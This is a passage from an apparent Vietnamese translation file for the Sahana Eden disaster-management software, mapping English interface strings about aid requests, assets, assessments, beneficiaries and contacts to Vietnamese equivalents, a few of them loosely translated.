Request deleted': 'Đã xóa yêu cầu cứu trợ', 'Aid Request updated': 'Đã cập nhật Yêu cầu cứu trợ', 'Aid Request': 'Yêu cầu cứu trợ', 'Aid Requests': 'yêu cầu cứu trợ', 'Aircraft Crash': 'Tại nạn máy bay', 'Aircraft Hijacking': 'Bắt cóc máy bay', 'Airport Closure': 'Đóng cửa sân bay', 'Airport': 'Sân bay', 'Airports': 'Sân bay', 'Airspace Closure': 'Đóng cửa trạm không gian', 'Alcohol': 'Chất cồn', 'Alerts': 'Cảnh báo', 'All Entities': 'Tất cả đối tượng', 'All Inbound & Outbound Messages are stored here': 'Tất cả tin nhắn gửi và nhận được lưu ở đây', 'All Open Tasks': 'Tất cả nhiệm vụ công khai', 'All Records': 'Tất cả hồ sơ', 'All Requested Items': 'Hàng hóa được yêu cầu', 'All Resources': 'Tất cả nguồn lực', 'All Tasks': 'Tất cả nhiệm vụ', 'All reports': 'Tất cả báo cáo', 'All selected': 'Tất cả', 'All': 'Tất cả', 'Allowance': 'Phụ cấp', 'Allowed to push': 'Cho phép bấm nút', 'Allows authorized users to control which layers are available to the situation map.': 'Cho phép người dùng đã đăng nhập kiểm soát layer nào phù hợp với bản đồ tình huống', 'Alternative Item Details': 'Chi tiết mặt hàng thay thế', 'Alternative Item added': 'Mặt hàng thay thế đã được thêm', 'Alternative Item deleted': 'Mặt hàng thay thế đã được xóa', 'Alternative Item updated': 'Mặt hàng thay thế đã được cập nhật', 'Alternative Items': 'Mặt hàng thay thế', 'Ambulance Service': 'Dịch vụ xe cứu thương', 'Amount': 'Tổng ngân sách', 'An Assessment Template can be selected to create a Disaster Assessment. Within a Disaster Assessment, responses can be collected and results can analyzed as tables, charts and maps': 'Mẫu đánh giá có thể được chọn để tạo ra một Đánh giá tình hình Thảm họa. Trong Đánh giá tình hình Thảm họa, các hoạt động ứng phó có thể được tổng hợp và kết quả có thể được phân tích dưới dạng bảng, biểu đồ và bản đồ', 'An Item Category must have a Code OR a Name.': 'Danh mục hàng hóa phải có Mã hay Tên.', 'Analysis': 'Phân tích', 'Animal Die Off': 'Động vật tuyệt chủng', 'Animal Feed': 'Thức ăn động vật', 'Annual Budget deleted': 'Ngân sách năm đã được xóa', 'Annual Budget updated': 'Ngân sách năm đã được cập nhật', 'Annual Budget': 'Ngân sách năm', 'Annual Budgets': 'Ngân sách năm', 'Anonymous': 'Ẩn danh', 'Answer Choices (One Per Line)': 'Chọn câu trả lời', 'Any available Metadata in the files will be read automatically, such as Timestamp, Author, Latitude & Longitude.': 'Thông tin có sẵn trong file như Timestamp,Tác giả, Kinh độ, Vĩ độ sẽ được đọc tự động', 'Any': 'Bất cứ', 'Applicable to projects in Pacific countries only': 'Chỉ áp dụng cho dự án trong các nước thuộc khu vực Châu Á - Thái Bình Dương', 'Application Permissions': 'Chấp nhận đơn đăng ký', 'Application': 'Đơn đăng ký', 'Apply changes': 'Lưu thay đổi', 'Approval pending': 'Đang chờ phê duyệt', 'Approval request submitted': 'Yêu cầu phê duyệt đã được gửi', 'Approve': 'Phê duyệt', 'Approved By': 'Được phê duyệt bởi', 'Approved by %(first_initial)s.%(last_initial)s': 'Được phê duyệt bởi %(first_initial)s.%(last_initial)s', 'Approved': 'Đã phê duyệt', 'Approver': 'Người phê duyệt', 'ArcGIS REST Layer': 'Lớp ArcGIS REST', 'Archive not Delete': 'Bản lưu không xóa', 'Arctic Outflow': 'Dòng chảy từ Bắc Cực', 'Are you sure you want to delete this record?': 'Bạn có chắc bạn muốn xóa hồ sơ này?', 'Arrived': 'Đã đến', 'As of yet, no sections have been added to this template.': 'Chưa hoàn thành, không mục nào được thêm vào mẫu này', 'Assessment Answer Details': 'Nội dung câu trả lời trong mẫu đánh giá', 'Assessment Answer added': 'Câu trả lời trong mẫu đánh giá đã được thêm', 'Assessment Answer deleted': 'Câu trả lời trong mẫu đánh giá đã được xóa', 'Assessment Answer updated': 'Câu trả lời trong mẫu đánh giá đã được cập nhật', 'Assessment Answers': 'Câu trả lời trong mẫu đánh', 'Assessment Question Details': 'Nội dung câu trả hỏi trong mẫu đánh giá', 'Assessment Question added': 'Câu trả hỏi trong mẫu đánh giá đã được thêm', 'Assessment Question deleted': 'Câu trả hỏi trong mẫu đánh giá đã được xóa', 'Assessment Question updated': 'Câu trả hỏi trong mẫu đánh giá đã được cập nhật', 'Assessment Questions': 'Câu trả hỏi trong mẫu đánh', 'Assessment Template Details': 'Nội dung biểu mẫu đánh giá', 'Assessment Template added': 'Biểu mẫu đánh giá đã được thêm', 'Assessment Template deleted': 'Biểu mẫu đánh giá đã được xóa', 'Assessment Template updated': 'Biểu mẫu đánh giá đã được cập nhật', 'Assessment Templates': 'Biểu mẫu đánh giá', 'Assessment admin level': 'Cấp quản lý đánh giá', 'Assessment and Community/ Beneficiary Identification': 'Đánh giá và xác định đối tượng/ cộng đồng hưởng lợi', 'Assessment timeline': 'Khung thời gian đánh giá', 'Assessment updated': 'Đã cập nhật Trị giá tính thuế', 'Assessment': 'Đánh giá', 'Assessments': 'Đánh giá', 'Asset Details': 'Thông tin tài sản', 'Asset Log Details': 'Chi tiết nhật ký tài sản', 'Asset Log Empty': 'Xóa nhật ký tài sản', 'Asset Log Entry deleted': 'Ghi chép nhật ký tài sản đã được xóa', 'Asset Log Entry updated': 'Ghi chép nhật ký tài sản đã được cập nhật', 'Asset Log': 'Nhật ký tài sản', 'Asset Number': 'Số tài sản', 'Asset added': 'Tài sản đã được thêm', 'Asset deleted': 'Tài sản đã được xóa', 'Asset updated': 'Tài sản đã được cập nhật', 'Asset': 'Tài sản', 'Assets are resources which are not consumable but are expected back, so they need tracking.': 'Tài sản là các nguồn lực không tiêu hao và có thể được hoàn trả nên cần theo dõi tài sản', 'Assets': 'Tài sản', 'Assign Asset': 'Giao tài sản', 'Assign Human Resource': 'Phân chia nguồn nhân lực', 'Assign New Human Resource': 'Phân chia nguồn nhân lực mới', 'Assign Role to a User': 'Phân công vai trò cho người sử dụng', 'Assign Roles': 'Phân công vai trò', 'Assign Staff': 'Phân công cán bộ', 'Assign Vehicle': 'Phân công phương tiện vận chuyển', 'Assign another Role': 'Phân công vai trò khác', 'Assign to Facility/Site': 'Phân công tới Bộ phân/ Địa bàn', 'Assign to Organization': 'Phân công tới Tổ chức', 'Assign to Person': 'Phân công tới đối tượng', 'Assign': 'Phân công', 'Assigned By': 'Được phân công bởi', 'Assigned Roles': 'Vai trò được phân công', 'Assigned To': 'Được phân công tới', 'Assigned to Facility/Site': 'Được phân công tới Bộ phân/ Địa bàn', 'Assigned to Organization': 'Được phân công tới Tổ chức', 'Assigned to Person': 'Được phân công tới đối tượng', 'Assigned to': 'Được phân công tới', 'Assigned': 'Được phân công', 'Association': 'Liên hiệp', 'At or below %s': 'Tại đây hoặc phí dưới %s', 'At/Visited Location (not virtual)': 'Địa điêm ở/đã đến (không ảo)', 'Attachments': 'Đính kèm', 'Attribution': 'Quyền hạn', 'Australian Dollars': 'Đô la Úc', 'Authentication Required': 'Xác thực được yêu cầu', 'Author': 'Tác giả', 'Auxiliary Role': 'Vai trò bổ trợ', 'Availability': 'Thời gian có thể tham gia', 'Available Alternative Inventories': 'Hàng tồn kho thay thế sẵn có', 'Available Forms': 'Các mẫu có sẵn', 'Available Inventories': 'Hàng tồn kho sẵn có', 'Available databases and tables': 'Cơ sở dữ liệu và bảng biểu sẵn có', 'Available in Viewer?': 'Sẵn có để xem', 'Available until': 'Sẵn sàng cho đến khi', 'Avalanche': 'Tuyết lở', 'Average': 'Trung bình', 'Award Type': 'Hình thức khen thưởng', 'Award': 'Khen thưởng', 'Awarding Body': 'Cấp khen thưởng', 'Awards': 'Khen thưởng', 'Awareness Raising': 'Nâng cao nhận thức', 'BACK TO %(system_name_short)s': 'TRỞ LẠI %(system_name_short)s', 'BACK TO MAP VIEW': 'TRỞ LẠI XEM BẢN ĐỒ', 'BROWSE OTHER REGIONS': 'LỰA CHỌN CÁC VÙNG KHÁC', 'Baby And Child Care': 'Chăm sóc trẻ em', 'Bachelor': 'Cửa nhân', "Bachelor's Degree": 'Trung cấp, cao đẳng, đại học', 'Back to Roles List': 'Quay trở lại danh sách vai trò', 'Back to Users List': 'Quay trở lại danh sách người sử dụng', 'Back to the main screen': 'Trở lại màn hình chính', 'Back': 'Trở lại', 'Background Color': 'Màu nền', 'Baldness': 'Cây trụi lá', 'Bank/micro finance': 'Tài chính Ngân hàng', 'Base %(facility)s Set': 'Tập hợp %(facility)s nền tảng', 'Base Facility/Site Set': 'Tập hợp Bộ phận/ Địa bàn nền tảng', 'Base Layer?': 'Lớp bản đồ cơ sở?', 'Base Layers': 'Lớp bản đồ cơ sở', 'Base Location': 'Địa điểm nền tảng', 'Base URL of the remote Sahana Eden instance including application path, e.g. http://www.example.org/eden': 'Đường dẫn Cơ bản của Hệ thống Sahana Eden từ xa bao gồm đường dẫn ứng dụng như http://www.example.org/eden', 'Base Unit': 'Đơn vị cơ sở', 'Basic Details': 'Chi tiết cơ bản', 'Basic information on the requests and donations, such as category, the units, contact details and the status.': 'Thông tin cơ bản về các yêu cầu và quyên góp như thể loại, tên đơn vị, chi tiết liên lạc và tình trạng', 'Basic reports on the Shelter and drill-down by region': 'Báo cáo cơ bản về nơi cư trú và báo cáo chi tiết theo vùng', 'Baud rate to use for your modem - The default is safe for most cases': 'Tốc độ truyền sử dụng cho mô đem của bạn - Chế độ mặc định là an toàn trong hầu hết các trường hợp', 'Bed Type': 'Loại Giường', 'Behaviour Change Communication': 'Truyền thông thay đổi hành vi', 'Beneficiaries Added': 'Người hưởng lợi đã được thêm', 'Beneficiaries Deleted': 'Người hưởng lợi đã được xóa', 'Beneficiaries Details': 'Thông tin của người hưởng lợi', 'Beneficiaries Updated': 'Người hưởng lợi đã được cập nhật', 'Beneficiaries': 'Người hưởng lợi', 'Beneficiary Report': 'Báo cáo người hưởng lợi', 'Beneficiary Type Added': 'Loại người hưởng lợi đã được thêm', 'Beneficiary Type Deleted': 'Loại người hưởng lợi đã được xóa', 'Beneficiary Type Updated': 'Loại người hưởng lợi đã được cập nhật', 'Beneficiary Type': 'Đối tượng hưởng lợi', 'Beneficiary Types': 'Đối tượng hưởng lợi', 'Beneficiary of preferential treatment policy': 'Là đối tượng chính sách', 'Beneficiary': 'Người Hưởng lợi', 'Better Programming Initiative Guidance': 'Hướng dẫn sử dụng tài liệu BPI', 'Bin': 'Thẻ kho', 'Bing Layer': 'Lớp thừa', 'Biological Hazard': 'Hiểm họa sinh học', 'Biscuits': 'Bánh quy', 'Blizzard': 'Bão tuyết', 'Blocked': 'Bị chặn', 'Blood Donation and Services': 'Hiến máu và Dịch vụ về máu', 'Blood Type (AB0)': 'Nhóm máu (ABO)', 'Blowing Snow': 'Tuyết lở', 'Body Recovery Requests': 'Yêu cầu phục hồi cơ thể', 'Body Recovery': 'Phục hồi thân thể', 'Body': 'Thân thể', 'Bomb Explosion': 'Nổ bom', 'Bomb Threat': 'Nguy cơ nổ bom', 'Bomb': 'Bom', 'Border Color for Text blocks': 'Màu viền cho khối văn bản', 'Both': 'Cả hai', 'Branch Capacity Development': 'Phát triển năng lực cho Tỉnh/ thành Hội', 'Branch Organization Details': 'Thông tin tổ chức cơ sở', 'Branch Organization added': 'Tổ chức cơ sở đã được thêm', 'Branch Organization deleted': 'Tổ chức cơ sở đã được xóa', 'Branch Organization updated': 'Tổ chức cơ sở đã được cập nhật', 'Branch Organizations': 'Tổ chức cơ sở', 'Branch': 'Cơ sở', 'Branches': 'Cơ sở', 'Brand Details': 'Thông tin nhãn hiệu', 'Brand added': 'Nhãn hiệu đã được thêm', 'Brand deleted': 'Nhãn hiệu đã được xóa', 'Brand updated': 'Nhãn hiệu đã được cập nhật', 'Brand': 'Nhãn hiệu', 'Brands': 'Nhãn hiệu', 'Breakdown': 'Chi tiết theo', 'Bridge Closed': 'Cầu đã bị đóng', 'Buddhist': 'Tín đồ Phật giáo', 'Budget Updated': 'Cập nhât ngân sách', 'Budget deleted': 'Đã xóa ngân sách', 'Budget': 'Ngân sách', 'Budgets': 'Ngân sách', 'Buffer': 'Đệm', 'Bug': 'Lỗi', 'Building Collapsed': 'Nhà bị sập', 'Building Name': 'Tên tòa nhà', 'Bulk Uploader': 'Công cụ đê tải lên số lượng lớn thông tin', 'Bundle Updated': 'Cập nhật Bundle', 'Bundles': 'Bó', 'By Warehouse': 'Bằng Kho hàng', 'By Warehouse/Facility/Office': 'Bằng Kho hàng/ Bộ phận/ Văn phòng', 'By selecting this you agree that we may contact you.': 'Bằng việc lựa chọn bạn đồng ý chúng tôi có thể liên lạc với bạn', 'CBDRM': 'QLRRTHDVCĐ', 'COPY': 'Sao chép', 'CREATE': 'TẠO', 'CSS file %s not writable - unable to apply theme!': 'không viết được file CSS %s - không thể áp dụng chủ đề', 'CV': 'Quá trình công tác', 'Calculate': 'Tính toán', 'Calculation': 'Tính toán', 'Calendar': 'Lịch', 'Camp': 'Trạm/chốt tập trung', 'Can only approve 1 record at a time!': 'Chỉ có thể phê duyệt 1 hồ sơ mỗi lần', 'Can only disable 1 record at a time!': 'Chỉ có thể vô hiệu 1 hồ sơ mỗi lần', 'Can only update 1 record at a time!': 'Chỉ có thể cập nhật 1 hồ sơ mỗi lần', 'Can read PoIs either from an OpenStreetMap file (.osm) or mirror.': 'Có thể đọc PoIs từ cả định dạng file OpenStreetMap (.osm) hoặc mirror.', 'Canadian Dollars': 'Đô la Canada', 'Cancel Log Entry': 'Hủy ghi chép nhật ký', 'Cancel Shipment': 'Hủy lô hàng vận chuyển', 'Cancel editing': 'Hủy chỉnh sửa', 'Cancel': 'Hủy', 'Canceled': 'Đã hủy', 'Cannot delete whilst there are linked records. Please delete linked records first.': 'Không xóa được khi đang có bản thu liên quan.Hãy xóa bản thu trước', 'Cannot disable your own account!': 'Không thể vô hiệu tài khoản của chính bạn', 'Cannot make an Organization a branch of itself!': 'Không thể tạo ra tổ chức là tổ chức cơ sở của chính nó', 'Cannot open created OSM file!': 'Không thể mở file OSM đã tạo', 'Cannot read from file: %(filename)s': 'Không thể đọc file: %(filename)s', 'Cannot send messages if Messaging module disabled': 'Không thể gửi tin nhắn nếu chức năng nhắn tin bị tắt', 'Capacity Building of Staff': 'Xây dựng năng lực cho Cán bộ', 'Capacity Building of Volunteers': 'Xây dựng năng lực cho Tình nguyện viên', 'Capacity Building': 'Xây dựng năng lực', 'Capacity Development': 'Nâng cao năng lực', 'Capture Information on Disaster Victim groups (Tourists, Passengers, Families, etc.)': 'Nắm bắt thông tin của các nạn nhân chịu ảnh hưởng của thiên tai(Khách du lịch,Gia đình...)', 'Card number': 'Số thẻ BHXH', 'Cardiology': 'Bệnh tim mạch', 'Cases': 'Trường hợp', 'Casual Labor': 'Nhân công thời vụ', 'Catalog Details': 'Thông tin danh mục', 'Catalog Item added': 'Mặt hàng trong danh mục đã được thêm', 'Catalog Item deleted': 'Mặt hàng trong danh mục đã được xóa', 'Catalog Item updated': 'Mặt hàng trong danh mục đã được cập nhật', 'Catalog Items': 'Mặt hàng trong danh mục', 'Catalog added': 'Danh mục đã được thêm', 'Catalog deleted': 'Danh mục đã được xóa', 'Catalog updated': 'Danh mục đã được cập nhật', 'Catalog': 'Danh mục', 'Catalogs': 'Danh mục', 'Categories': 'Chủng loại', 'Category': 'Chủng loại', 'Center': 'Trung tâm', 'Certificate Catalog': 'Danh mục chứng nhận', 'Certificate Details': 'Thông tin chứng nhận', 'Certificate List': 'Danh sách chứng nhận', 'Certificate Status': 'Tình trạng của chứng nhận', 'Certificate added': 'Chứng nhận đã được thêm', 'Certificate deleted': 'Chứng nhận đã được xóa', 'Certificate updated': 'Chứng nhận đã được cập nhật', 'Certificate': 'Chứng nhận', 'Certificates': 'Chứng nhận', 'Certification Details': 'Thông tin bằng cấp', 'Certification added': 'Bằng cấp đã được thêm', 'Certification deleted': 'Bằng cấp đã được xóa', 'Certification updated': 'Bằng cấp đã được cập nhật', 'Certifications': 'Bằng cấp', 'Certifying Organization': 'Tổ chức xác nhận', 'Change Password': 'Thay đổi mật khẩu', 'Chart': 'Biểu đồ', 'Check Request': 'Kiểm tra yêu cầu', 'Check for errors in the URL, maybe the address was mistyped.': 'Kiểm tra lỗi đường dẫn URL, địa chỉ có thể bị đánh sai', 'Check if the URL is pointing to a directory instead of a webpage.': 'Kiểm tra nếu đường dẫn URL chỉ dẫn đến danh bạ chứ không phải đến trang web', 'Check outbox for the message status': 'Kiểm tra hộp thư đi để xem tình trạng thư gửi đi', 'Check this to make your search viewable by others.': 'Chọn ô này để người khác có thể xem được tìm kiếm của bạn', 'Check': 'Kiểm tra', 'Check-In': 'Đăng ký', 'Check-Out': 'Thanh toán', 'Checked': 'Đã kiểm tra', 'Checking your file...': 'Kiểm tra file của bạn', 'Checklist of Operations': 'Danh sách kiểm tra các hoạt động', 'Chemical Hazard': 'Hiểm họa óa học', 'Child (2-11)': 'Trẻ em (2-11)', 'Child Abduction Emergency': 'Tình trạng khẩn cấp về lạm dụng trẻ em', 'Children (2-5 years)': 'Trẻ em (từ 2-5 tuổi)', 'Children (< 2 years)': 'Trẻ em (dưới 2 tuổi)', 'Choose Country': 'Lựa chọn quốc gia', 'Choose File': 'Chọn file', 'Choose country': 'Lựa chọn quốc gia', 'Choose': 'Lựa chọn', 'Christian': 'Tín đồ Cơ-đốc giáo', 'Church': 'Nhà thờ', 'Circumstances of disappearance, other victims/witnesses who last saw the missing person alive.': 'Hoàn cảnh mất tích, những nhân chứng nhìn thấy lần gần đây nhất nạn nhân còn sống', 'City / Town / Village': 'Phường/ Xã', 'Civil Emergency': 'Tình trạng khẩn cấp dân sự', 'Civil Society/NGOs': 'Tổ chức xã hội/NGOs', 'Clear filter': 'Xóa', 'Clear selection': 'Xóa lựa chọn', 'Clear': 'Xóa', 'Click anywhere on the map for full functionality': 'Bấm vào vị trí bất kỳ trên bản đồ để có đầy đủ chức năng', 'Click on a marker to see the Completed Assessment Form': 'Bấm vào nút đánh dấu để xem Mẫu đánh giá đã hoàn chỉnh', 'Click on the chart to show/hide the form.': 'Bấm vào biểu đồ để hiển thị/ ẩn mẫu', 'Click on the link %(url)s to reset your password': 'Bấm vào đường dẫn %(url)s khởi tạo lại mật khẩu của bạn', 'Click on the link %(url)s to verify your email': 'Bấm vào đường dẫn %(url)s để kiểm tra địa chỉ email của bạn', 'Click to dive in to regions or rollover to see more': 'Bấm để dẫn tới vùng hoặc cuộn chuột để xem gần hơn', 'Click where you want to open Streetview': 'Bấm vào chỗ bạn muốn xem ở chế độ Đường phố', 'Climate Change Adaptation': 'Thích ứng với Biến đổi khí hậu', 'Climate Change Mitigation': 'Giảm nhẹ Biến đổi khí hậu', 'Climate Change': 'Biến đổi khí hậu', 'Clinical Laboratory': 'Phòng thí nghiệm lâm sàng', 'Close Adjustment': 'Đóng điều chỉnh', 'Close map': 'Đóng bản đồ', 'Close': 'Đóng', 'Closed': 'Đã đóng', 'Closed?': 'Đã Đóng?', 'Cluster Details': 'Thông tin nhóm', 'Cluster Distance': 'Khoảng cách các nhóm', 'Cluster Threshold': 'Ngưỡng của mỗi nhóm', 'Cluster added': 'Nhóm đã được thêm', 'Cluster deleted': 'Nhóm đã được xóa', 'Cluster updated': 'Nhóm đã được cập nhật', 'Cluster': 'Nhóm', 'Cluster(s)': 'Nhóm', 'Clusters': 'Nhóm', 'Code Share': 'Chia sẻ mã', 'Code': 'Mã', 'Cold Wave': 'Đợt lạnh', 'Collect PIN from Twitter': 'Thu thập mã PIN từ Twitter', 'Color of selected Input fields': 'Màu của trường đã được chọn', 'Column Choices (One Per Line': 'Chọn cột', 'Columns': 'Cột', 'Combined Method': 'phương pháp được kết hợp', 'Come back later. Everyone visiting this site is probably experiencing the same problem as you.': 'Quay lại sau. Mọi người ghé thăm trang này đều gặp vấn đề giống bạn.', 'Come back later.': 'Quay lại sau.', 'Comment': 'Ghi chú', 'Comments': 'Ghi chú', 'Commit Date': 'Thời điểm cam kết', 'Commit': 'Cam kết', 'Commit. Status': 'Tình trạng cam kết', 'Commitment Added': 'Cam kết đã được thêm', 'Commitment Canceled': 'Cam kết đã được hủy', 'Commitment Details': 'Thông tin của cam kết', 'Commitment Item Details': 'Thông tin mặt hàng cam kết', 'Commitment Item added': 'Mặt hàng cam kết đã được thêm', 'Commitment Item deleted': 'Mặt hàng cam kết đã được xóa', 'Commitment Item updated': 'Mặt hàng cam kết đã được cập nhật', 'Commitment Items': 'Mặt hàng cam kết', 'Commitment Updated': 'Cam kết đã được cập nhật', 'Commitment': 'Cam kết', 'Commitments': 'Cam kết', 'Committed By': 'Cam kết bởi', 'Committed People': 'Người đã Cam kết', 'Committed Person Details': 'Thông tin người đã cam kết', 'Committed Person updated': 'Người cam kết đã được cập nhật', 'Committed': 'Đã Cam kết', 'Committing Organization': 'Tổ chức cam kết', 'Committing Person': 'Người đang cam Kết', 'Committing Warehouse': 'Kho hàng đang cam kết', 'Commodities Loaded': 'Hàng hóa được đưa lên xe', 'Commune Name': 'Tên xã', 'Commune': 'Phường/ Xã', 'Communicable Diseases': 'Bệnh dịch lây truyền', 'Communities': 'Địa bàn dự án', 'Community Action Planning': 'Lập kế hoạch hành động của cộng đồng', 'Community Added': 'Công đồng đã được thêm', 'Community Contacts': 'Thông tin liên hệ của cộng đồng', 'Community Deleted': 'Công đồng đã được xóa', 'Community Details': 'Thông tin về cộng đồng', 'Community Health Center': 'Trung tâm sức khỏe cộng đồng', 'Community Health': 'Chăm sóc sức khỏe cộng đồng', 'Community Member': 'Thành viên cộng đồng', 'Community Mobilisation': 'Huy động cộng đồng', 'Community Mobilization': 'Huy động cộng đồng', 'Community Organisation': 'Tổ chức cộng đồng', 'Community Organization': 'Tổ chức cộng đồng', 'Community Updated': 'Công đồng đã được cập nhật', 'Community Health': 'CSSK Cộng đồng', 'Community': 'Cộng đồng', 'Community-based DRR': 'GTRRTH dựa vào cộng đồng', 'Company': 'Công ty', 'Competency Rating Catalog': 'Danh mục xếp hạng năng lực', 'Competency Rating Details': 'Thông tin xếp hạng năng lực', 'Competency Rating added': 'Xếp hạng năng lực đã được thêm', 'Competency Rating deleted': 'Xếp hạng năng lực đã được xóa', 'Competency Rating updated': 'Xếp hạng năng lực đã được cập nhật', 'Competency Rating': 'Xếp hạng năng lực', 'Competency': 'Cấp độ thành thục', 'Complete Returns': 'Quay lại hoàn toàn', 'Complete Unit Label for e.g. meter for m.': 'Nhãn đơn vị đầy đủ. Ví dụ mét cho m.', 'Complete': 'Hoàn thành', 'Completed Assessment Form Details': 'Thông tin biểu mẫu đánh giá đã hoàn thiện', 'Completed Assessment Form deleted': 'Biểu mẫu đánh giá đã hoàn thiện đã được thêm', 'Completed Assessment Form entered': 'Biểu mẫu đánh giá đã hoàn thiện đã được nhập', 'Completed Assessment Form updated': 'Biểu mẫu đánh giá đã hoàn thiện đã được cập nhật', 'Completed Assessment Forms': 'Biểu mẫu đánh giá đã hoàn thiện', 'Completed Assessments': 'Các Đánh giá đã Hoàn thành', 'Completed': 'Hoàn thành', 'Completion Question': 'Câu hỏi hoàn thành', 'Complex Emergency': 'Tình huống khẩn cấp phức tạp', 'Complexion': 'Cục diện', 'Compose': 'Soạn thảo', 'Condition': 'Điều kiện', 'Conduct a Disaster Assessment': 'Thực hiện đánh giá thảm họa', 'Config added': 'Cấu hình đã được thêm', 'Config updated': 'Cập nhật tùy chỉnh', 'Config': 'Tùy chỉnh', 'Configs': 'Cấu hình', 'Configuration': 'Cấu hình', 'Configure Layer for this Symbology': 'Thiết lập cấu hình lớp cho biểu tượng này', 'Configure Run-time Settings': 'Thiết lập cấu hình cho cài đặt thời gian hoạt động', 'Configure connection details and authentication': 'Thiêt lập cấu hình cho thông tin kết nối và xác thực', 'Configure resources to synchronize, update methods and policies': 'Cài đặt cấu hình các nguồn lực để đồng bộ, cập nhật phương pháp và chính sách', 'Configure the default proxy server to connect to remote repositories': 'Thiết lập cấu hình cho máy chủ mặc định để kết nối tới khu vực lưu trữ từ xa', 'Configure/Monitor Synchonization': 'Thiêt lập cấu hình/ giám sát đồng bộ hóa', 'Confirm Shipment Received': 'Xác nhận lô hàng đã nhận', 'Confirm that some items were returned from a delivery to beneficiaries and they will be accepted back into stock.': 'Xác nhận một số mặt hàng đã được trả lại từ bên vận chuyển tới người hưởng lợi và các mặt hàng này sẽ được chấp thuân nhập trở lại kho.', 'Confirm that the shipment has been received by a destination which will not record the shipment directly into the system and confirmed as received.': 'Xác nhận lô hàng đã nhận đến điểm gửi mà không biên nhập lô hàng trực tiếp vào hệ thống và đã xác nhận việc nhận hàng', 'Confirmed': 'Đã xác nhận', 'Confirming Organization': 'Tổ chức xác nhận', 'Conflict Policy': 'Xung đột Chính sách', 'Construction of Transitional Shelter': 'Xây dựng nhà tạm', 'Consumable': 'Có thể tiêu dùng được', 'Contact Added': 'Thông tin liên hệ đã được thêm', 'Contact Data': 'Dữ liệu thông tin liên hệ', 'Contact Deleted': 'Thông tin liên hệ đã được xóa', 'Contact Details': 'Thông tin hợp đồng', 'Contact Info': 'Thông tin liên hệ', 'Contact Information Added': 'Thông tin liên hệ đã được thêm', 'Contact Information Deleted': 'Thông tin liên hệ đã được xóa', 'Contact Information Updated': 'Thông tin liên hệ đã được cập nhật', 'Contact Information': 'Thông tin liên hệ', 'Contact Method': 'Phương pháp liên hệ', 'Contact People': 'Người liên hệ', 'Contact Person': 'Người liên hệ', 'Contact Persons': 'Người liên hệ', 'Contact Updated': 'Thông tin liên hệ đã được cập nhật', 'Contact us': 'Liên hệ chúng tôi', 'Contact': 'Thông tin liên hệ', 'Contacts': 'Thông tin liên hệ', 'Contents': 'Nội dung', 'Context': 'Bối cảnh', 'Contingency/ Preparedness Planning': 'Lập kế hoạch dự phòng/ phòng ngừa', 'Contract End Date': 'Ngày kết thúc hợp đồng', 'Contributor': 'Người đóng góp', 'Controller': 'Người kiểm soát', 'Conversion Tool': 'Công cụ chuyển đổi', 'Coordinate Layer': 'Lớp điều phối', 'Coordination and Partnerships': 'Điều phối và Hợp tác', 'Copy': 'Sao chép', 'Corn': 'Ngũ cốc', 'Corporate Entity': 'Thực thể công ty', 'Could not add person record': 'Không thêm được hồ sơ cá nhân', 'Could not auto-register at the repository, please register manually.': 'Không thể đăng ký tự động vào kho dữ liệu, đề nghị đăng ký thủ công', 'Could not create record.': 'Không tạo được hồ sơ', 'Could not generate report': 'Không tạo được báo cáo', 'Could not initiate manual synchronization.': 'Không thể bắt đầu việc đồng bộ hóa thủ công', 'Count of Question': 'Số lượng câu Hỏi', 'Count': 'Số lượng', 'Countries': 'Quốc gia', 'Country Code': 'Quốc gia cấp', 'Country in': 'Quốc gia ở', 'Country is required!': 'Quốc gia bắt buộc điền!', 'Country': 'Quốc gia', 'County / District (Count)': 'Quận / Huyện (số lượng)', 'County / District': 'Quận/ Huyện', 'Course Catalog': 'Danh mục khóa tập huấn', 'Course Certificate Details': 'Thông tin chứng nhận khóa tập huấn', 'Course Certificate added': 'Chứng nhận khóa tập huấn đã được thêm', 'Course Certificate deleted': 'Chứng nhận khóa tập huấn đã được xóa', 'Course Certificate updated': 'Chứng nhận khóa tập huấn đã được cập nhật', 'Course Certificates': 'Chứng chỉ khóa học', 'Course Details': 'Thông tin khóa tập huấn', 'Course added': 'Khóa tập huấn đã được thêm', 'Course deleted': 'Khóa tập huấn đã được xóa', 'Course updated': 'Khóa tập huấn đã được cập nhật', 'Course': 'Khóa tập huấn', 'Create & manage Distribution groups to receive Alerts': 'Tạo & quản lý nhóm phân phát để nhận cảnh báo', 'Create Activity Type': 'Thêm loại hình hoạt động', 'Create Activity': 'Thêm hoạt động', 'Create Assessment Template': 'Thêm biểu mẫu đánh giá', 'Create Assessment': 'Thêm đợt đánh giá', 'Create Asset': 'Thêm tài sản', 'Create Award': 'Thêm khen thưởng', 'Create Award Type': 'Thêm hình thức khen thưởng', 'Create Beneficiary Type': 'Thêm loại người hưởng lợi', 'Create Brand': 'Thêm nhãn hàng', 'Create Catalog Item': 'Thêm mặt hàng vào danh mục', 'Create Catalog': 'Thêm danh mục', 'Create Certificate': 'Thêm chứng nhận', 'Create Cluster': 'Thêm nhóm', 'Create Community': 'Thêm cộng đồng', 'Create Competency Rating': 'Thêm xếp loại năng lực', 'Create Contact': 'Thêm liên lạc', 'Create Course': 'Thêm khóa tập huấn', 'Create Department': 'Thêm phòng/ban', 'Create Disaster Assessment': 'Thêm báo cáo đánh giá thảm họa', 'Create Facility Type': 'Thêm loại hình bộ phận', 'Create Facility': 'Thêm bộ phận', 'Create Feature Layer': 'Thêm lớp chức năng', 'Create Group Entry': 'Tạo ghi chép nhóm', 'Create Group': 'Thêm nhóm', 'Create Hazard': 'Thêm hiểm họa', 'Create Hospital': 'Thêm Bệnh viện', 'Create Incident Report': 'Thêm báo cáo sự cố', 'Create Incident': 'Thêm sự kiện', 'Create Item Category': 'Thêm loại hàng hóa', 'Create Item Pack': 'Thêm gói hàng hóa', 'Create Item': 'Tạo mặt hàng mới', 'Create Item': 'Thêm hàng hóa', 'Create Job Title': 'Thêm chức danh công việc', 'Create Job': 'Thêm công việc', 'Create Kit': 'Thêm dụng cụ', 'Create Layer': 'Thêm lớp', 'Create Location Hierarchy': 'Thêm thứ tự địa điểm', 'Create Location': 'Thêm địa điểm', 'Create Mailing List': 'Thêm danh sách gửi thư', 'Create Map Profile': 'Thêm cài đặt cấu hình bản đồ', 'Create Marker': 'Thêm công cụ đánh dấu', 'Create Member': 'Thêm hội viên', 'Create Membership Type': 'Thêm loại hội viên', 'Create Milestone': 'Thêm mốc quan trọng', 'Create National Society': 'Thêm Hội Quốc gia', 'Create Office Type': 'Thêm loại hình văn phòng mới', 'Create Office': 'Thêm văn phòng', 'Create Organization 